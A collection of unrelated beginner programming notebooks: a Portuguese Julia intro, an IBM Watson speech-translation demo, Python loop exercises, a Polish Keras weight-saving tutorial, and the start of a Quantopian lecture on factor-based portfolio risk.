if nota>7 && freq>=0.75
aprov = "Aprovado"
else
aprov = "Reprovado"
end
return aprov
end
luiz = aprovacao(9,0.8)
luiz
# + [markdown] id="qjYW0m89vYgf"
# # Loops
# + id="Ue_0hYaMvbnW" colab={"base_uri": "https://localhost:8080/"} outputId="79d2445f-55d5-44b6-93e5-d46b306bfaf7"
function media_turma()
notas = [5,5,6,6,7,7,8,8,9,9]
soma=0
for i in 1:length(notas)
soma = soma+ notas[i]
end
return soma/length(notas)
end
mt = media_turma()
mt
# + colab={"base_uri": "https://localhost:8080/"} id="Ei2Clk5lUBOk" outputId="800829e4-b053-4efb-cf0b-95e436deacd9"
notas = [5,5,6,6,7,7,8,8,9,9]
notas[1]
# + [markdown] id="T0HKieaVwD-i"
# # Funcao de Alta Ordem
# + id="bCMu8xQ2wHYd" colab={"base_uri": "https://localhost:8080/"} outputId="9faaf97e-0488-4aab-e6a0-ae703f3d8c92"
function somar(x,y)
s = x+y
return s
end
function calculadora(f,x,y)
return f(x,y)
end
r = calculadora(somar,1,2)
r
# + [markdown] id="hrvoSFM5vIqJ"
# #Analise de Dados
# + id="9eCGkzkRvXQN" colab={"base_uri": "https://localhost:8080/"} outputId="33411c93-6d53-4d76-a532-005b11144f14"
import Pkg
Pkg.add("CSV")
Pkg.add("DataFrames")
Pkg.add("HTTP")
using CSV
using DataFrames
using HTTP
# + id="mHKKDOpbvo2S" colab={"base_uri": "https://localhost:8080/"} outputId="1de978ec-efd9-4df4-fc61-b16542be4ddf"
;wget http://quant-ibmec.group/notas.csv
# + colab={"base_uri": "https://localhost:8080/"} id="ANAoR102WF1O" outputId="e99ae82e-65a8-4df7-f700-4f467690ca92"
;ls -la
# + id="PY8qdNdJvK0u" colab={"base_uri": "https://localhost:8080/"} outputId="bcf1e34e-c245-4bd2-f8ad-f2c99eb17264"
notas=CSV.read("notas.csv", DataFrame)
@show typeof(notas)
print(notas)
# + colab={"base_uri": "https://localhost:8080/"} id="MKm1ErTfHFM9" outputId="354f3426-5a09-49f8-ef2e-52f47dc0e8ed"
grades = DataFrame(CSV.File(HTTP.get("http://quant-ibmec.group/notas.csv").body))
print(grades)
# + colab={"base_uri": "https://localhost:8080/", "height": 129} id="NKzagjOjLkwr" outputId="2e9b0998-e990-4370-ae08-bffeef5395a0"
first(grades,2)
# + id="LtCEzBCNBOPP" colab={"base_uri": "https://localhost:8080/"} outputId="42428010-5e82-4544-bf5b-a0333a7ba34d"
print(notas.AP1)
# + colab={"base_uri": "https://localhost:8080/"} id="muwqYx7-IZ5z" outputId="860dddcf-5531-43e0-d2b3-7b1295b684b8"
notas.AP1
# + colab={"base_uri": "https://localhost:8080/"} id="AYJBfrwpHu4J" outputId="ea563ec7-a066-4fb6-fc8b-4dae85a53ec3"
notas.MF=notas.AP1*0.4+notas.AP2*0.4+notas.AP3*0.2
print(notas)
# + [markdown] id="XPG_I7GAvK7Q"
# # Matrizes
# + [markdown] id="bdnpqswqyrp8"
# |Julia|Python
# |-----|------
# |`a = [1, 2, 3]` | `a = [1, 2, 3]`<br />or<br />`import numpy as np`<br />`np.array([1, 2, 3])`
# |`a[1]` | `a[0]`
# |`a[end]` | `a[-1]`
# |`a[2:end-1]` | `a[1:-1]`
# |`push!(a, 5)` | `a.append(5)`
# |`pop!(a)` | `a.pop()`
# |`M = [1 2 3]` | `np.array([[1, 2, 3]])`
# |`M = [1 2 3]'` | `np.array([[1, 2, 3]]).T`
# |`M = hvcat(1, 1, 2, 3)` | `np.array([[1], [2], [3]])`
# |`M = [1 2 3`<br /> `4 5 6]`<br />or<br />`M = [1 2 3; 4 5 6]` | `M = np.array([[1,2,3], [4,5,6]])`
# |`M[1:2, 2:3]` | `M[0:2, 1:3]`
# |`[M1; M2]` | `np.r_[M1, M2]`
# |`[M1 M2]` | `np.c_[M1, M2]`
# |`[M1 M2; M3]` | `np.r_[np.c_[M1, M2], M3]`
#
# + colab={"base_uri": "https://localhost:8080/"} id="-rM-Gx4gMIpo" outputId="881c6e6b-a025-4e2f-acad-aadd2ea148ff"
notas = [5 5 5
9 9 9
6 7 8]
pesos = [0.4 0.4 0.2]
mf = notas * pesos'
print(mf)
# + [markdown] id="9Gxz4BVNMJDs"
# # Outras Referencias
# + [markdown] id="Ie9QcVsYWDFh"
# |Julia|Python
# |-----|------
# |`Dict("tree"=>"arbre", "love"=>"amour")` | `{"tree": "arbre", "love": "amour"}`
# |`d["arbre"]` | `d["arbre"]`
# |`get(d, "unknown", "default")` | `d.get("unknown", "default")`
# |`keys(d)` | `d.keys()`
# |`values(d)` | `d.values()`
# |`haskey(d, k)` | `k in d`
# |`Dict(i=>i^2 for i in 1:4)` | `{i: i**2 for i in 1:4}`
# |`for (k, v) in d` | `for k, v in d.items():`
# |`merge(d1, d2)` | `{**d1, **d2}`
# |`merge!(d1, d2)` | `d1.update(d2)`
# + [markdown] id="nPrJ9Ih9X4ak"
# |Julia|Python
# |-----|------
# |`Set([1, 3, 5, 7])` | `{1, 3, 5, 7}`
# |`5 in odd` | `5 in odd`
# |`Set([i^2 for i in 1:4])` | `{i**2 for i in range(1, 5)}`
# |`odd ∪ primes` | `odd | primes`
# |`union(odd, primes)` | `odd.union(primes)`
# |`odd ∩ primes` | `odd & primes`
# |`insersect(odd, primes)` | `odd.intersection(primes)`
# |`setdiff(odd, primes)` | `odd - primes` or `odd.difference(primes)`
# |`symdiff(odd, primes)` | `odd ^ primes` or `odd.symmetric_difference(primes)`
# + [markdown] id="bBCsVIXEHD29"
# |Julia|Python
# |-----|------
# |`@enum Fruit apple=1 banana=2 orange=3` | `from enum import Enum`<br />`class Fruit(Enum):`<br /> `APPLE = 1`<br /> `BANANA = 2`<br /> `ORANGE = 3`
# | `Fruit(2) === banana` | `Fruit(2) is Fruit.BANANA`
# | `instances(Fruit)` | `dir(Fruit)`
#
# + [markdown] id="K3EO6cQmMW0W"
# |Julia|Python
# |-----|------
# |`a === b` | `a is b`
# |`a !== b` | `a is not b`
# |`objectid(obj)` | `id(obj)`
# + [markdown] id="UpbuZ0RYGsC2"
# The `options` vararg acts like a dictionary (we will discuss dictionaries later). The keys are **symbols**, e.g., `:verbose`. Symbols are like strings, less flexible but faster. They are typically used as keys or identifiers.
#
# |Julia|Python (3.8+ if `/` is used)
# |-----|------
# | `function foo(a, b=2, c=3)`<br /> `...`<br />`end`<br /><br />`foo(1, 2) # positional only` | `def foo(a, b=2, c=3, /):`<br /> `...`<br /><br />`foo(1, 2) # pos only because of /`
# | `function foo(;a=1, b, c=3)`<br /> `...`<br />`end`<br /><br />`foo(c=30, b=2) # keyword only` | `def foo(*, a=1, b, c=3):`<br /> `...`<br /><br />`foo(c=30, b=2) # kw only because of *`
# | `function foo(a, b=2; c=3, d)`<br /> `...`<br />`end`<br /><br />`foo(1; d=4) # pos only; then keyword only` | `def foo(a, b=2, /, *, c=3, d):`<br /> `...`<br /><br />`foo(1, d=4) # pos only then kw only`
# | `function foo(a, b=2, c...)`<br /> `...`<br />`end`<br /><br />`foo(1, 2, 3, 4) # positional only` | `def foo(a, b=2, /, *c):`<br /> `...`<br /><br />`foo(1, 2, 3, 4) # positional only`
# | `function foo(a, b=1, c...; d=1, e, f...)`<br /> `...`<br />`end`<br /><br />`foo(1, 2, 3, 4, e=5, x=10, y=20)`<br /> | `def foo(a, b=1, /, *c, d=1, e, **f):`<br /> `...`<br /><br />`foo(1, 2, 3, 4, e=5, x=10, y=20)`
#
# + [markdown] id="7RcghJ-EEUjz"
#
# |Julia|Python
# |-----|------
# |`x -> x^2` | `lambda x: x**2`
# |`(x,y) -> x + y` | `lambda x,y: x + y `
# |`() -> println("yes")` | `lambda: print("yes")`
#
# + [markdown] id="tHMPBcYYNJ-n"
# A few things to note here:
#
# * Julia only allows a single `catch` block which handles all possible exceptions.
# * `obj isa SomeClass` is a shorthand for `isa(obj, SomeClass)` which is equivalent to Python's `isinstance(obj, SomeClass)`.
#
# |Julia|Python
# |-----|------
# |`try`<br /> `...`<br />`catch ex`<br /> `if ex isa SomeError`<br /> `...`<br /> `else`<br /> `...`<br /> `end`<br />`finally`<br /> `...`<br />`end` | `try:`<br /> `...`<br />`except SomeException as ex:`<br /> `...`<br />`except Exception as ex:`<br /> `...`<br />`finally:`<br /> `...`
# |`throw any_value` | `raise SomeException(...)`
# | `obj isa SomeType`<br />or<br /> `isa(obj, SomeType`) | `isinstance(obj, SomeType)`
# + [markdown] id="Jz7_FaJcaZn-"
# In short:
#
# |Julia | Python
# |------|-------
# |`import Foo` | `import foo`
# |`import Foo.Bar` | `from foo import bar`
# |`import Foo.Bar: a, b` | `from foo.bar import a, b`
# |`import Foo.Bar.a, Foo.Bar.b` | `from foo.bar import a, b`
# |`import .Foo` | `import .foo`
# |`import ..Foo.Bar` | `from ..foo import bar`
# |`import ...Foo.Bar` | `from ...foo import bar`
# |`import .Foo: a, b` | `from .foo import a, b`
# ||
# |`using Foo` | `from foo import *; import foo`
# |`using Foo.Bar` | `from foo.bar import *; from foo import bar `
# |`using Foo.Bar: a, b` | `from foo.bar import a, b`
#
# |Extending function `Foo.f()` | Result
# |-----------------------------|--------
# |`import Foo.f # or Foo: f` <br />`f(x::Int64) = ...` | OK
# |`import Foo`<br />`Foo.f(x::Int64) = ...` | OK
# |`using Foo`<br />`Foo.f(x::Int64) = ...` | OK
# |`import Foo.f # or Foo: f`<br />`Foo.f(x::Int64) = ...` | `ERROR: Foo not defined`
# |`using Foo`<br />`f(x::Int64) = ...` | `ERROR: Foo.f must be explicitly imported`
# |`using Foo: f`<br />`f(x::Int64) = ...` | `ERROR: Foo.f must be explicitly imported`
# + [markdown] id="rQY6BRiBvdbU"
# |Julia (in interactive mode) | Python (in a terminal)
# |-----|------
# |`]status` | `pip freeze`<br />or<br />`conda list`
# |`]add Foo` | `pip install foo`<br />or<br />`conda install foo`
# |`]add Foo@1.2` | `pip install foo==1.2`<br />or<br />`conda install foo=1.2`
# |`]update Foo` | `pip install --upgrade foo`<br />or<br />`conda update foo`
# |`]pin Foo` | `foo==<version>` in `requirements.txt`<br /> or<br />`foo=<version>` in `environment.yml`
# |`]free Foo` | `foo` in `requirements.txt`<br />or<br />`foo` in `environment.yml`
# |`]test Foo` | `python -m unittest foo`
# |`]rm Foo` | `pip uninstall foo`<br />or<br />`conda remove foo`
# |`]help` | `pip --help`
#
# + id="Z3IpBJjap9Sm"
|
QM_IntroJulia.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/Cherrise-exe/LanguageTranslation_Watson/blob/main/voiceTranslation_withWatson.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="vZ_1-X1Nl8YK"
# 1. Authenticate
# + colab={"base_uri": "https://localhost:8080/"} id="kqrXundFl_Ju" outputId="ea95a9e2-f4ce-408b-c7fb-2fc1a2cfa063"
pip install ibm_watson
# + id="X_KTLbi8uVuV"
from ibm_watson import SpeechToTextV1, LanguageTranslatorV3, TextToSpeechV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
# + id="PvnHQcMRvHjq"
ltapikey = 'insert language translation apikey here'
lturl = 'insert language translation url here'
sttapikey = 'insert speech to text apikey here'
stturl = 'insert speech to text url here'
ttsapikey = 'insert text to speech apikey here'
ttsurl = 'insert text to speech url here'
# + id="H034XcxSFBuA"
# Setup Service
ttsauthenticator = IAMAuthenticator(ttsapikey)
# New TTS Service
tts = TextToSpeechV1(authenticator = ttsauthenticator)
# Set Service URL
tts.set_service_url(ttsurl)
# + id="DePHIoBj3eoH"
# Setup Service
ltauthenticator = IAMAuthenticator(ltapikey)
# New TTS Service
lt = LanguageTranslatorV3(version='2018-05-01', authenticator=ltauthenticator)
# Set Service URL
lt.set_service_url(lturl)
# + id="iR0xg4A68-YJ"
# Setup Service
sttauthenticator = IAMAuthenticator(sttapikey)
# New TTS Service
stt = SpeechToTextV1(authenticator=sttauthenticator)
# Set Service URL
stt.set_service_url(stturl)
# + [markdown] id="UMpDQ--5l8e5"
# 2. Speech to Text
# + id="C-6CXwlal_VD"
with open('sample.mp3', 'rb') as f:
res = stt.recognize(audio=f, content_type='audio/mp3', model='en-US_NarrowbandModel').get_result()
# + colab={"base_uri": "https://localhost:8080/"} id="BxAQmh-k-WhE" outputId="f4d7431f-9c64-4dad-e750-c78243df9038"
res
# + id="ywoZ0wDp8k90"
voicetext = res['results'][0]['alternatives'][0]['transcript']
# + [markdown] id="dk9MHWD7l8iR"
# 3. Text Translation
# + id="1WN2aCZHl_iV"
englishtoSpanish = 'en-es'
# + id="BbiQtgPEA4Dj"
translation = lt.translate(text=voicetext, model_id=englishtoSpanish).get_result()
# + colab={"base_uri": "https://localhost:8080/"} id="ISGIMt-VBdi5" outputId="0cafd517-bd7e-4cdf-ce95-7354bf304a4e"
translation
# + id="RVEUV9RwDYd4"
translatedtext = translation['translations'][0]['translation']
# + colab={"base_uri": "https://localhost:8080/", "height": 36} id="zJWYYUm1DmFV" outputId="3416a002-793b-41f5-b1db-20ef49956ca3"
translatedtext
# + [markdown] id="EQ25pmiBuIy4"
# 4. Output Translation
# + id="OwVTHx67ExEd"
voice = 'es-US_SofiaV3Voice'
# + id="3eSeS7ACuISW"
with open('translatedSample.mp3', 'wb') as audio_file:
res = tts.synthesize(translatedtext, accept='audio/mp3', voice=voice).get_result()
audio_file.write(res.content)
|
voiceTranslation_withWatson.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/janvincentvallente/CPEN-21A-CPE-1-2/blob/main/Loop_Statement.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="kkunsp41KHz3"
# ##For Loop
# + colab={"base_uri": "https://localhost:8080/"} id="x_zuSmqYKLwn" outputId="0bc11f7e-af78-423a-b074-7ab2a7f189c4"
week = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
for x in week:
print(x)
# + [markdown] id="LTKOq_N-LNSj"
# The Break Statement
# + colab={"base_uri": "https://localhost:8080/"} id="RDs06vrDLQ_J" outputId="631828ff-5a9f-47cb-dcc7-c5509613e4d8"
for x in week:
print(x)
if x=="Thursday":
break
# + colab={"base_uri": "https://localhost:8080/"} id="Y4vFdkb6Lj1-" outputId="31af1cf2-b412-45c1-ca32-ba34114fcdce"
#The break statement
for x in week:
if x=="Thursday":
break
print(x)
# + [markdown] id="dFYEyFGrMM2y"
# Looping Through String
# + colab={"base_uri": "https://localhost:8080/"} id="jTboojbXMSYy" outputId="e87282ad-833b-4fe6-9aaa-df6324bde378"
for x in "Programming in Python":
print(x)
# + [markdown] id="vYar6YWfMrQj"
# The Range() Function
# + colab={"base_uri": "https://localhost:8080/"} id="NJ_GMhOYMv5L" outputId="413ee63b-5edf-4082-e49c-e85c04005477"
for x in range(10):
print(x)
# + [markdown] id="wFPjAfKrN10D"
# Nested Loops
# + colab={"base_uri": "https://localhost:8080/"} id="HvkN6kvEN34x" outputId="617c6c31-b18d-44b2-cbc6-3c71a015d53f"
adjective = ["red", "big", "tasty"]
fruits = ["apple", "banana", "cherry"]
for x in adjective:
for y in fruits:
print(x,y)
# + [markdown] id="LRL34ZmaOT5C"
# ##While Loop
# + colab={"base_uri": "https://localhost:8080/"} id="xFTU0sNbOWWR" outputId="5fca592d-af4d-47a3-a124-92e9297308c8"
i = 10
while i>6:
print(i)
i-=1 #Assignment operator for subtraction, i=i-1
# + [markdown] id="JJqTz63cPdMb"
# The Break Statement
# + colab={"base_uri": "https://localhost:8080/"} id="baAEWYMuPf2w" outputId="3590634f-9c43-496c-cbdd-1df26f910bde"
i = 10
while i>6:
print(i)
if i==8:
break
i-=1
# + [markdown] id="dW3s_MWyQUfh"
# The Continue Statement
# + colab={"base_uri": "https://localhost:8080/"} id="MOUD8bN-Q-py" outputId="20def923-2f6e-4cd6-c54c-e89c7f94178a"
i = 10
while i>6:
i-=1
if i==8:
continue
print(i)
# + [markdown] id="rViSN0hTRUsZ"
# The Else Statement
# + colab={"base_uri": "https://localhost:8080/"} id="_L4hnVpaRXSp" outputId="1d9d0621-7da7-406a-fe0f-46ff3ead05f0"
i = 10
while i>6:
i-=1
print(i)
else:
print("i is no longer greater than 6")
# + [markdown] id="eZ7EjS4KSD6B"
# Application 1
# + colab={"base_uri": "https://localhost:8080/"} id="DJys_PnFSGZa" outputId="60b29378-f9c9-4324-9d87-5196194931a9"
#For loop
a = ["Value"]
number = [0,1,2,3,4,5,6,7,8,9,10]
for x in a:
for y in number:
print(x,y)
# + colab={"base_uri": "https://localhost:8080/"} id="rMQhv6X4XjWp" outputId="2c98f159-cc99-408a-ef58-1550cea972c6"
#While loop
i = -1
while i<10:
i+=1
print("Value", i)
if i==10:
break
# + [markdown] id="Mdk2rDltSG0I"
# Application 2
# + colab={"base_uri": "https://localhost:8080/"} id="XiRkJdtFSWeQ" outputId="1577cb21-7b01-4b59-84b2-3ede04a80db0"
#While loop
i = 20
while i>3:
i-=1
print(i)
if i==4:
break
#else:
#print("i is no longer greater than 3")
|
Loop_Statement.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/krakowiakpawel9/neural-network-course/blob/master/03_keras/06_save_load_model.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="yDsCNSGvU6UW"
# * @author: <EMAIL>
# * @site: e-smartdata.org
# + [markdown] id="5gjFu2l9IMsj"
# ### Zapisywanie i ładowanie wag z modelu
#
# Celem tego notebook'a jest nauczenie się pracy z obsługą modeli, m.in.:
# - zapisanie wag po każdej epoce
# - zapisanie wag po określonej liczbie epok
# - załadowanie wag
# - zapisanie całego modelu
# - załadowanie całego modelu
#
# ### Spis treści:
# 1. [Import bibliotek](#a0)
# 2. [Załadowanie danych i wstępna eksploracja](#a1)
# 3. [Budowa modelu](#a2)
# 4. [Zapisywanie punktów kontrolnych podczas trenowania](#a3)
# 5. [Załadowanie wag do modelu](#a4)
# 6. [Dodatkowe opcje](#a5)
# 7. [Ręczne zapisywanie wag](#a6)
# 8. [Zapisanie całego modelu](#a7)
#
#
#
# + [markdown] id="54PMwXoAJOhq"
# ### <a name='a0'> </a> 1. Import bibliotek
# + id="lyxtFjeeGECa"
# Przygotowanie środowiska do pracy z Tensorflow 2.0.
# Jeśli otrzymasz błąd podczas instalacji Tensorflow uruchom tę komórkę raz jeszcze.
# !pip uninstall -y tensorflow
# !pip install -q tensorflow==2.0.0
# + id="IqX0mhs4EXOo" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="93be2e89-a85f-4aa4-a55a-8e4804254712"
import os
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
from tensorflow.keras.datasets import mnist
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout
sns.set()
tf.__version__
# + [markdown] id="sYB9C6JnJYWG"
# ### <a name='a1'> </a> 2. Załadowanie danych i wstępna eksploracja
# + id="UBD08VRs909Y" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="ab938e93-8b20-48c9-e0d3-2be5f123ec2e"
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
# + id="3WxmAgGl-eS1" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="8125d138-01ad-4697-a91a-9e0c9d1885d5"
train_images.shape
# + id="kddg_vs0-is5" colab={"base_uri": "https://localhost:8080/", "height": 265} outputId="59836cb6-9589-407b-9167-a453bc325f68"
plt.imshow(train_images[0], cmap='gray_r')
plt.grid(False)
plt.axis(False)
# + id="JTmBsyF8-nFt" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="d86bf235-a8eb-43c4-8fb4-a35b7d19da39"
train_labels[:10]
# + id="OgpEXGgd_MTn"
train_images = train_images[:1000].reshape(-1, 28 * 28) / 255.
test_images = test_images[:1000].reshape(-1, 28 * 28) / 255.
train_labels = train_labels[:1000]
test_labels = test_labels[:1000]
# + [markdown] id="1mOy5Lf3JeRK"
# ### <a name='a2'> </a> 3. Budowa modelu
# + id="RCKJWnY0_kIb" colab={"base_uri": "https://localhost:8080/", "height": 255} outputId="ea1ccf21-0094-4c13-bf74-062ce59dce15"
def create_model():
model = Sequential()
model.add(Dense(512, activation='relu', input_shape=(784,)))
model.add(Dropout(0.2))
model.add(Dense(10, activation='softmax'))
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
return model
model = create_model()
model.summary()
# + [markdown] id="d3n8nqGqAU1q"
# ### <a name='a3'> </a> 4. Zapisywanie punktów kontrolnych podczas trenowania
# + id="o-dNZfs-AP4G"
checkpoint_path = 'training/cp.ckpt'
checkpoint_dir = os.path.dirname(checkpoint_path)
# + id="djxpL94pAryk" colab={"base_uri": "https://localhost:8080/", "height": 731} outputId="6cf2cd65-3080-4294-d37b-3744390360af"
from tensorflow.keras.callbacks import ModelCheckpoint
cp_callback = ModelCheckpoint(filepath=checkpoint_path,
save_weights_only=True,
verbose=1)
model.fit(train_images, train_labels, epochs=10, validation_data=(test_images, test_labels), callbacks=[cp_callback])
# + id="6BUsATRjBKnY" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="d3449710-f58e-4f56-cec2-783b750428d4"
# ls -l {checkpoint_dir}
# + [markdown] id="_NnhVksfB-7r"
# ### <a name='a4'> </a> 5. Załadowanie wag do modelu
# + id="VGogndNiBnpf" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="19191a5c-9e42-4810-a364-72c8082c3d82"
model = create_model()
loss, acc = model.evaluate(test_images, test_labels, verbose=2)
print(acc)
# + id="3zGt9VvDCMfF" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="58233c0a-ba6b-43a9-8aa6-3459cc8b2cff"
model.load_weights(checkpoint_path)
loss, acc = model.evaluate(test_images, test_labels, verbose=2)
print(acc)
# + [markdown] id="mYNgLmH1D05K"
# ### <a name='a5'> </a> 6. Dodatkowe opcje
# + id="YNxS9XAPHmfj"
# !rm -rf ./training
# + id="a6UE41gQCu6f" colab={"base_uri": "https://localhost:8080/", "height": 391} outputId="8df0ebe5-3cdd-4679-eac2-989ccc7c85f7"
checkpoint_path = 'training/cp-{epoch:04d}.ckpt'
checkpoint_dir = os.path.dirname(checkpoint_path)
cp_callback = ModelCheckpoint(filepath=checkpoint_path,
save_weights_only=True,
period=5,
verbose=1)
model = create_model()
model.save_weights(checkpoint_path.format(epoch=0))
model.fit(train_images, train_labels, epochs=50, validation_data=(test_images, test_labels), callbacks=[cp_callback], verbose=0)
# + id="3-AHX5juEcY9" colab={"base_uri": "https://localhost:8080/", "height": 425} outputId="024cb563-3049-4bec-b990-e1b0300256e7"
# !ls -l ./training
# + id="509374ChEqfh" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="1cbb6047-48e3-41f9-e19b-de197325199b"
import tensorflow as tf
latest = tf.train.latest_checkpoint(checkpoint_dir)
latest
# + id="97MrbQqJFp2s" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="31d6a5f6-d8ab-4e9a-d13a-bd2ece827618"
model = create_model()
model.load_weights(latest)
loss, acc = model.evaluate(test_images, test_labels, verbose=2)
print(acc)
# + [markdown] id="mz-fWfcgGKGo"
# ### <a name='a6'> </a> 7. Ręczne zapisywanie wag
# + id="MKC-tEIHF40H" colab={"base_uri": "https://localhost:8080/", "height": 173} outputId="560bfbf7-de7f-4a85-bf3d-47c7a596689a"
model.save_weights('./checkpoints/my_checkpoint')
model = create_model()
model.load_weights('./checkpoints/my_checkpoint')
loss, acc = model.evaluate(test_images, test_labels, verbose=2)
print(acc)
# + id="IAD7o2W3GjHm" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="e8ed6aea-3ebc-4e22-fac1-f6c92ac5aa69"
# !ls -l checkpoints/
# + [markdown] id="ZXqSRptdG2ba"
# ### <a name='a7'> </a> 8. Zapisanie całego modelu
# + id="uUAb5awSGrlF" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="1677971f-f74b-489f-ef41-58b40a657b99"
model = create_model()
model.fit(train_images, train_labels, epochs=5)
model.save('my_model.h5')
# + id="WCUeP6g0HAL4" colab={"base_uri": "https://localhost:8080/", "height": 255} outputId="6553862b-bbec-49fa-ab1f-d3f41652bbfd"
from tensorflow.keras.models import load_model
new_model = load_model('my_model.h5')
new_model.summary()
# + id="jYpSl2VBHhvw" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="91646fbc-4308-4139-8fe9-be6cb69412b7"
loss, acc = new_model.evaluate(test_images, test_labels, verbose=2)
print(acc)
|
03_keras/06_save_load_model.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from IPython.display import display, Markdown
a = 13.49
b = 2.2544223
P = 302.99
V = 90.02
display(Markdown(
rf"""
Dims: $\mathrm{{ {a*b:.4} \, m \times {b:.3} \, m }}$
Area: $\mathrm{{ {P} \, m^2 }}$
Volume: $\mathrm{{ {V} \, m^3}}$
"""))
|
Ejercitacion/practica2/Untitled.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Risk-Constrained Portfolio Optimization
#
# by <NAME> and <NAME>
#
# Part of the Quantopian Lecture Series:
# * [www.quantopian.com/lectures](https://www.quantopian.com/lectures)
# * [https://github.com/quantopian/research_public](https://github.com/quantopian/research_public)
#
# ---
# Risk management is critical for constructing portfolios and building algorithms. Its main function is to improve the quality and consistency of returns by adequately accounting for risk. Any returns obtained by *unexpected* risks, which are always lurking within our portfolio, can usually not be relied upon to produce profits over a long time. By limiting the impact of or eliminating these unexpected risks, the portfolio should ideally only have exposure to the alpha we are pursuing. In this lecture, we will focus on how to use factor model in risk management.
#
# ## Factor Models
# We have written many lectures on [Factor Models](https://www.quantopian.com/lectures/the-capital-asset-pricing-model-and-arbitrage-pricing-theory) and the calculation of [Factor Risk Exposure](https://www.quantopian.com/lectures/factor-risk-exposure), as well as [how to analyze alpha factors](https://www.quantopian.com/lectures/factor-analysis). The notation we generally use when introducing a factor model is as follows:
#
# $$R_i = a_i + b_{i1} F_1 + b_{i2} F_2 + \ldots + b_{iK} F_k + \epsilon_i$$
#
# where:
# $$\begin{eqnarray}
# k &=& \text{the number of factors}\\
# R_i &=& \text{the return for company $i$}, \\
# a_i &=& \text{the intercept},\\
# F_j &=& \text{the return for factor $j$, $j \in [1,k]$}, \\
# b_{ij} &=& \text{the corresponding exposure to factor $j$, $j \in [1,k]$,} \\
# \epsilon_i &=& \text{specific fluctuation of company $i$.}\\
# \end{eqnarray}$$
#
#
# To quantify unexpected risks and have acceptable risk levels in a given portfolio, we need to answer 3 questions:
#
# 1. What proportion of the variance of my portfolio comes from common risk factors?
#
# 2. How do I limit this risk?
#
# 3. Where does the return/PNL of my portfolio come from, i.e., to what do I attribute the performance?
# These risk factors can be:
# - Classical fundamental factors, such as those in the [CAPM](https://www.quantopian.com/lectures/the-capital-asset-pricing-model-and-arbitrage-pricing-theory) (market risk) or the [Fama-French 3-Factor Model](https://www.quantopian.com/lectures/fundamental-factor-models) (price-to-book (P/B) ratio, volatility)
# - Sector or industry exposure
# - Macroeconomic factors, such as inflation or interest rates
# - Statistical factors that are based on historical returns and derived from principal component
# analysis
# ### Universe
#
# The base universe of assets we use here is the QTradableStocksUS.
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import statsmodels.api as sm
from quantopian.pipeline import Pipeline
from quantopian.pipeline.data import Fundamentals
from quantopian.pipeline.data.builtin import USEquityPricing
from quantopian.pipeline.factors import CustomFactor, Returns
from quantopian.pipeline.experimental import QTradableStocksUS
from quantopian.research import run_pipeline
# date range for building risk model
start = "2009-01-01"
end = "2011-01-01"
# First we pull the returns of every asset in this universe across our desired time period.
# +
def qtus_returns(start_date, end_date):
pipe = Pipeline(
columns={'Close': USEquityPricing.close.latest},
screen = QTradableStocksUS()
)
stocks = run_pipeline(pipe, start_date, end_date)
unstacked_results = stocks.unstack()
prices = (unstacked_results['Close'].fillna(method='ffill').fillna(method='bfill')
.dropna(axis=1,how='any').shift(periods=-1).dropna())
qus_returns = prices.pct_change()[1:]
return qus_returns
R = qtus_returns(start, end)
print "The universe we define includes {} assets.".format(R.shape[1])
print 'The number of timestamps is {} from {} to {}.'.format(R.shape[0], start, end)
# -
assets = R.columns
# ### Factor Returns and Exposures
#
# We will start with the classic Fama-French factors. The Fama-French factors are the market, company size, and company price-to-book (PB) ratio. We compute each asset's exposures to these factors, computing the factors themselves using pipeline code borrowed from the [Fundamental Factor Models lecture](https://www.quantopian.com/lectures/fundamental-factor-models).
def make_pipeline():
"""
Create and return our pipeline.
We break this piece of logic out into its own function to make it easier to
test and modify in isolation.
In particular, this function can be copy/pasted into the backtester and run by itself.
"""
# Market Cap
market_cap = Fundamentals.shares_outstanding.latest/USEquityPricing.close.latest
# Book to Price ratio
